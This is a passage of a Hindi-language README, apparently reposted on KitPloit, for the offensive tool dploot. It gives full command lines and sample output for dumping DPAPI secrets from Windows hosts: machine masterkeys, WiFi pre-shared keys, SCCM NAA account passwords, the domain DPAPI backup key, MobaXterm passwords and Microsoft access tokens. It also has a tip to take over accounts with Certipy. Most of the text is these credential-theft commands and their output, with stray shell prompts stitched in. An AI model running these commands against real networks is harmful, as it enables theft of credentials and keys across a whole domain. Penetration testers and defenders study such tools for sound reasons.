{b5ebf413-65bd-4ee7-aa49-2a3110f678d2}:ad7475c1efdf3e834037bead151e30beaefeb349 {c1027a5b-0dcc-4237-af05-19839a94c12f}:fda0c774f6a8ff189ef2759a151f2c6bcf6a4d46 {e1a73282-709b-4717-ace0-00eecb280fcc}:cdb4c86722b50cecf87cf683c6d727f36d760dba {6fbe7c89-9810-4ce3-b841-f0f1dd8b46e6}:1fb57eb358ea26c617d39ce04c5feb613ab10b89 {750630e8-b603-4d43-941e-6f756073e511}:f9fd650d02a09e92069c54465455feeea12f0049 {9a4057a3-06f2-4e4f-9a88-79ea3c3cadfa}:5b966689d74393684a221752950b46fb5236b3db

[*] Triage SYSTEM Certificates

Issuer: CN=waza-ADCS1-CA,DC=waza,DC=local Subject: CN=DESKTOP-OJ3N8TJ.waza.local Valid Date: 2022-06-11 10:31:16 Expiry Date: 2023-06-11 10:31:16 Extended Key Usage: clientAuth (1.3.6.1.5.5.7.3.2) serverAuth (1.3.6.1.5.5.7.3.1) [!] Certificate is used for client auth!

-----BEGIN CERTIFICATE----- MIIFjTCCBHWgAwIBAgITewAAAAXrqLLiBZJG3AAAAAAABTANBgkqhkiG9w0BAQ0F ADBFMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxFDASBgoJkiaJk/IsZAEZFgR3YXph (snip) nXZ6/pA+XGqQwHG/hWG2TR5Ivjzoy+OjAgu44LqucC8Pw3wWToVWCKxdGgZcXqHE TXrQnLFK+nWqjrvJsM/O6HgNJbG/lqF/sogux3FLmW7a -----END CERTIFICATE-----

[-] Writting certificate to DESKTOP-OJ3N8TJ.waza.local_796449B12B788ABA.pfx

root@kitploit:~
***सुझाव***: *यदि आपको क्लाइंट प्रमाणीकरण EKU वाला सर्टिफिकेट मिलता है, तो आप [certipy](https://github.com/ly4k/Certipy) के साथ खाते पर कब्ज़ा कर सकते हैं।*

#### machinetriage

machinetriage कमांड [machinecredentials](#machinecredentials), [machinevaults](#machinevaults) और [machinecertificates](#machinecertificates) चलाता है।

### विविध

#### wifi

**wifi** कमांड किसी भी wifi xml कॉन्फ़िगरेशन फ़ाइल  और उन्हें एक या अधिक {GUID}:SHA1 के `-mkfile FILE` के साथ डिक्रिप्ट करेगा, अन्यथा dploot DPAPI_SYSTEM LSA सीक्रेट कुंजी डंप करेगा। किसी भी machine masterkey को डिक्रिप्ट करने के लिए, और फिर किसी भी मिले एन्क्रिप्टेड DPAPI private key blob को डिक्रिप्ट करेगा।```text
$ dploot wifi -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5
[*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage SYSTEM masterkeys

{b5ebf413-65bd-4ee7-aa49-2a3110f678d2}:ad7475c1efdf3e834037bead151e30beaefeb349
{c1027a5b-0dcc-4237-af05-19839a94c12f}:fda0c774f6a8ff189ef2759a151f2c6bcf6a4d46
{e1a73282-709b-4717-ace0-00eecb280fcc}:cdb4c86722b50cecf87cf683c6d727f36d760dba
{6fbe7c89-9810-4ce3-b841-f0f1dd8b46e6}:1fb57eb358ea26c617d39ce04c5feb613ab10b89
{750630e8-b603-4d43-941e-6f756073e511}:f9fd650d02a09e92069c54465455feeea12f0049
{9a4057a3-06f2-4e4f-9a88-79ea3c3cadfa}:5b966689d74393684a221752950b46fb5236b3db

[*] Triage ALL WIFI profiles

[WIFI]
SSID:		Wifi_G
AuthType:	WPA2PSK
Encryption:	AES
Preshared key:	AzErTy1234567890QwSxDcFvG

[WIFI]
SSID:		EAP_TLS
AuthType:	WPA2 EAP
Encryption:	AES
EAP Type:	EAP TLS

EapHostConfig:
  EapMethod:
    Type: 13
    VendorId: 0
    VendorType: 0
    AuthorId: 0
  Config:
    Eap:
      Type: 13
      EapType:
        CredentialsSource:
          CertificateStore:
            SimpleCertSelection: true
        ServerValidation:
          DisableUserPromptForServerValidation: false
          ServerNames: None
        DifferentUsername: false
        PerformServerValidation: true
        AcceptServerName: false

[snip]

sccm

sccm कमांड दूरस्थ लक्ष्य से NAA क्रेडेंशियल, संग्रह चर और कार्य अनुक्रम क्रेडेंशियल प्राप्त करेगा और उन्हें एक या अधिक {GUID}:SHA1 के -mkfile FILE के साथ डिक्रिप्ट करेगा, अन्यथा dploot किसी भी मशीन मास्टरकी को डिक्रिप्ट करने के लिए DPAPI_SYSTEM LSA गुप्त कुंजी डंप करेगा, और फिर मिले किसी भी एन्क्रिप्टेड DPAPI निजी कुंजी ब्लॉब को डिक्रिप्ट करेगा। -wmi का उपयोग करने पर WMI अनुरोध परिणामों से SCCM रहस्य डंप होंगे।```text $ dploot sccm -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 [*] Connected to 192.168.56.14 as waza.local\jsmith (admin)

[*] Triage SYSTEM masterkeys

{c1027a5b-0dcc-4237-af05-19839a94c12f}:fda0c774f6a8ff189ef2759a151f2c6bcf6a4d46 {e1a73282-709b-4717-ace0-00eecb280fcc}:cdb4c86722b50cecf87cf683c6d727f36d760dba {6fbe7c89-9810-4ce3-b841-f0f1dd8b46e6}:1fb57eb358ea26c617d39ce04c5feb613ab10b89 {750630e8-b603-4d43-941e-6f756073e511}:f9fd650d02a09e92069c54465455feeea12f0049

[*] Triage SCCM Secrets

[NAA Account] Username: NAAAccount Password: Password!123

[snip]

root@kitploit:~
#### backupkey

**backupkey** कमांड [MS-LDAD](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-lsad/1b5471ef-4c33-4a91-b079-dfcbb82f05cc) का उपयोग करके डोमेन कंट्रोलर से डोमेन DPAPI बैकअप कुंजी प्राप्त करेगा। यह कुंजी कभी नहीं बदलती है और किसी भी डोमेन उपयोगकर्ता के DPAPI-संरक्षित रहस्य को डिक्रिप्ट कर सकती है। डोमेन एडमिन विशेषाधिकार आवश्यक हैं।

डिफ़ॉल्ट रूप से, यह कमांड डोमेन बैकअप कुंजी को key.pvk नामक फ़ाइल में लिखेगा, लेकिन आप इसे `outputfile` फ़्लैग के साथ बदल सकते हैं। `legacy` फ़्लैग के साथ लीगेसी बैकअप कुंजी को डंप करना भी संभव है।```text
$ dploot backupkey -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.20
[*] Connected to dc01.waza.local as waza.local\e.cartman (admin)

[DOMAIN BACKUPKEY V2]

PVK_FILE_HDR
dwMagic: {2964713758}
dwVersion: {0}
dwKeySpec: {1}
dwEncryptType: {0}
cbEncryptData: {0}
cbPvk: {1172}
PRIVATEKEYBLOB:{1ef1b5b000000000010000000000000000000000940400000702000000a4000052534132000800000100010081a511b5e41ad9563aff9f591ba61bec76ba09859750b0bcbeff2ef26f06b1a85b6b763623249890587cee80495ad02c3c1554abf9eb472da753531186d1a58dc853ac85a31dc14348a477b1555e8f882a3c4543098896fe7523dabbfed2bda09a9cf86fdc017bb86375eec8058953193a58f8896c0c6f622da40cfee5f4734b07458176c3aa8ff1cbe3eaf6faa97d774c68f82b59a635d2e671d5e658bab75f7e6ca2d9c04bb5bf2aa18b13cb4b18951be73f0ec16e3e5d8e8caee9ab26d44e365b3669ccb03c1f2d25f24f6a7f2ac116975a9b58662c1aed40af1d0277b78dab978de25f7aaf09596b869fa5b7762c7f63b5ad0b8611826f79e37a252123f06f4cd136b5919607c768ebe59e1001952ae9bb74bb4462ffb5059473b836d8ca287bc0c01653d28da74798be1c867d364158d8fc3acbe287efe88ea24359b7cffa5b02fd61840a6b786ba33cf842e80231ded169eeb6bc582cb174a17f4dfdf25e7fdcd399f6dab6b62e91cdebaa882797b449bd591a5e189bc86ffc535771f60f05b0e4136d6e64c33adbd572e0c83b7762b0b5e81f36a9bc41c0445c652ddd4012d92839806a594af1b2abf392cbe052f585a69565d8ef23df0df41fdafbaa587cdda27c7a818590d48b75672c6459dc7a865fb69eaa0243c988d6a512bf2c6e24ddfdd1025a588a128cf981f2ed9370781b0f1a0c6ff1f4cccf22163073f9457f91d7fa2bd412bd8ce8d595ed1df2ea2ca1b9f02f0edba7a07ffddb81a6f2847a54ba0b1b8a6f78df0f5f2b29a347ce9b7b6f59e50c3828bfdefbba442f171c4c334c85ab7db48c6e4fd9acbd7d97e2ef59c56ad171b152c600977f6a19d8548ce931035995b5a3f6f70e2a4ac39ab071e39f8235ec3f238ac0017f71cbc4f52891d47ebb5114be9417a8d6a811a5c07025aa223fc6ac3dee729762ff1b34dab65cdce2a69887122d86054a03224fe9e982ad1071840ecdd18ebe3fc3eafa242d4a7bb917282fc2f157c6a9acef01871f70887e31e5b272fd20f39cf0256d96dde7f5380afca01917e57d04d11efa2e39051ca87ab61fd13e07555c8ab1137a8d916202ccd99b70c8ed080188fbf6691d621309441ac407865f985e44c5a2876a33f72a2bdef444b65d087eb150d8e83e9dc2eac198f0f3b9da26a32f2ba4d6b448ab4437778b74ecff7e94aae1020b2773469f80021ec4baaa202d859a21da601f3eff77b599f2249cc2e92019b97defbd2786599a9c331032db72356daec1236f703a6649aa5bc3eeef57177d9bb08d00844a573eb8fc356a36ffda43b2d790836a00fe632b124f280925bc13f1e60326ef0da237f2aaae721c0ffec02b84d09fe9f59d6aa68d19c61c9a794a0746ebe0d03af7563efa7ffef80462d10e30d65f2a9a75f44eba7b5222cffc49f331dc9f74bca51819e2b061ac558cc397bbf42e94ccb39625a584deb549eaf34dcfc2ecd9c9c0b0c2f65d4b6966d9e60a7a1c17c1848e7c7d7d4cd0054ad78a4991dbc8771aba7f26058fef848fd49fff622eed23e0dfcb453e178c189ae609cdb1aa2b1e4d4a8182c6dcd735581690d6fb52e5bddff1b37419cad1f84921235d5fa1e192c71bbada85527a14e7e06c53}


[-] Exporting domain backupkey to file key.pvk

mobaxterm

mobaxterm कमांड MobaXterm के सीक्रेट्स और मास्टरपासवर्ड की को हाइव (HKU) से निकालता है और उन्हें -mkfile FILE के साथ एक या अधिक {GUID}:SHA1 का उपयोग करके, या -passwords FILE के साथ user:password कॉम्बो, -nthashes के साथ user:nthash कॉम्बो या -pvk PVKFILE के साथ पहले मास्टरकी डिक्रिप्ट करके डिक्रिप्ट करता है। यदि यूज़र रिमोट टारगेट से कनेक्ट नहीं है, तो dploot NTUSER.dat से सीक्रेट्स डाउनलोड करके निकालेगा।

pvk के साथ:```text dploot mobaxterm -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 -pvk key.pvk [*] Connected to 192.168.56.14 as waza.local\jsmith (admin)

[*] Triage ALL USERS masterkeys

{6dedb662-3f3c-43a7-bfc4-e2990a48d4dd}:32c4eeeac475910a33f531b56cf9d73f35490d5e {21f17bcd-eac1-4187-9538-a744f2c6e17b}:198eba83e088a59fd75e6435b38804d4973a2c1e

[*] Triage MobaXterm Secrets

[MOBAXTERM CREDENTIAL] Name: TEST Username: user Password: waza1234

[MOBAXTERM PASSWORD] Username: mobauser@mobaserver Password: 309554moba231082pass322883

root@kitploit:~
### wam

**wam** कमांड Token Broker Cache से TBRES फ़ाइलों की खोज करेगा और उनकी सामग्री को एक या अधिक {GUID}:SHA1 वाले `-mkfile FILE` के साथ, या user:password के `-passwords FILE` कॉम्बो के साथ, user:nthash के `-nthashes` कॉम्बो के साथ, या पहले masterkeys को डिक्रिप्ट करने के लिए `-pvk PVKFILE` के साथ डिक्रिप्ट करेगा।

`pvk` के साथ:```text
dploot wam -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 -pvk key.pvk
[*] Connected to 192.168.56.14 as waza.local\jsmith (admin)

[*] Triage ALL USERS masterkeys

{d5efdaf1-9fd9-44e7-8bd1-7e017d458c14}:a7eac2a750069aa576e1e9f03f1dc37b2057adb3
{13405569-1685-49c7-90e2-0e7ce55e5b8b}:ab1b23d3380c53ac1dae1cdf62bc44b4db391bb9

[*] Triage Office Token Broken Cache for ALL USERS

[TBRES FILE]
Version: 1
expiration: 133668881920000000
responses: b'\x8aC\xed\x9f\xf4\xe6D!\x0c\x82\x86)\xab\x1d\xf9\xac'
WTRes_Token: access_token=eyJhb[...]

टिप्स: आप Entra उपयोगकर्ताओं के लिए Microsoft access token TBRES फ़ाइलों में पा सकते हैं।

blob

blob कमांड DPAPI blob को -mkfile FILE (जिसमें एक या अधिक {GUID}:SHA1 हों) या -masterkey {GUID}:SHA1 के साथ, या -passwords FILE के साथ user:password का कॉम्बो या -nthashes के साथ user:nthash का कॉम्बो, या पहले masterkeys को डिक्रिप्ट करने के लिए -pvk PVKFILE के साथ डिक्रिप्ट करेगा।

pvk के साथ:```text dploot blob -d waza.local -u jsmith -p 'Password#123' -t 192.168.56.14 -pvk key.pvk -blob 'AQAAANCMnd8BF[...]' [*] Connected to 192.168.56.14 as waza.local\jsmith (admin)

[*] Triage ALL USERS masterkeys

{d5efdaf1-9fd9-44e7-8bd1-7e017d458c14}:a7eac2a750069aa576e1e9f03f1dc37b2057adb3 {13405569-1685-49c7-90e2-0e7ce55e5b8b}:ab1b23d3380c53ac1dae1cdf62bc44b4db391bb9

[*] Trying to decrypt DPAPI blob

[BLOB] Version : 1 (1) Guid Credential : DF9D8CD0-1501-11D1-8C7A-00C04FC297EB MasterKeyVersion : 1 (1) Guid MasterKey : 13405569-1685-49C7-90E2-0E7CE55E5B8B Flags : 0 () Description : CryptAlgo : 00006603 (26115) (CALG_3DES) Salt : b'a5a15df8f0fb606897f28966dd5fcd9e' HMacKey : b'' HashAlgo : 00008004 (32772) (CALG_SHA) HMac : b'80b2dc6cee8d206d5dc5a9ef844f000a' Data : b'5ece8ce1dd8[...]

Data decrypted : b'0\x00\x00\x00\x01\x00\x00[...]'

root@kitploit:~
***टिप्स***: *आपको Entra उपयोगकर्ताओं के लिए Microsoft access token TBRES फ़ाइलों में मिल सकता है।*

## श्रेय

इन परियोजनाओं ने इस उपकरण को लिखने में बहुत मदद की:

- [Impacket](https://github.com/SecureAuthCorp/impacket) समुदाय द्वारा
- [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) [Harmj0y](https://twitter.com/harmj0y) द्वारा
- [Mimikatz](https://github.com/gentilkiwi/mimikatz/) [gentilkiwi](https://twitter.com/gentilkiwi) द्वारा
- [DonPAPI](https://github.com/login-securite/DonPAPI) [LoginSecurite](https://twitter.com/LoginSecurite) द्वारा
- [WAMBam](https://github.com/xpn/WAMBam) [_xpn_](https://twitter.com/_xpn_) द्वारा
टूल डाउनलोड करें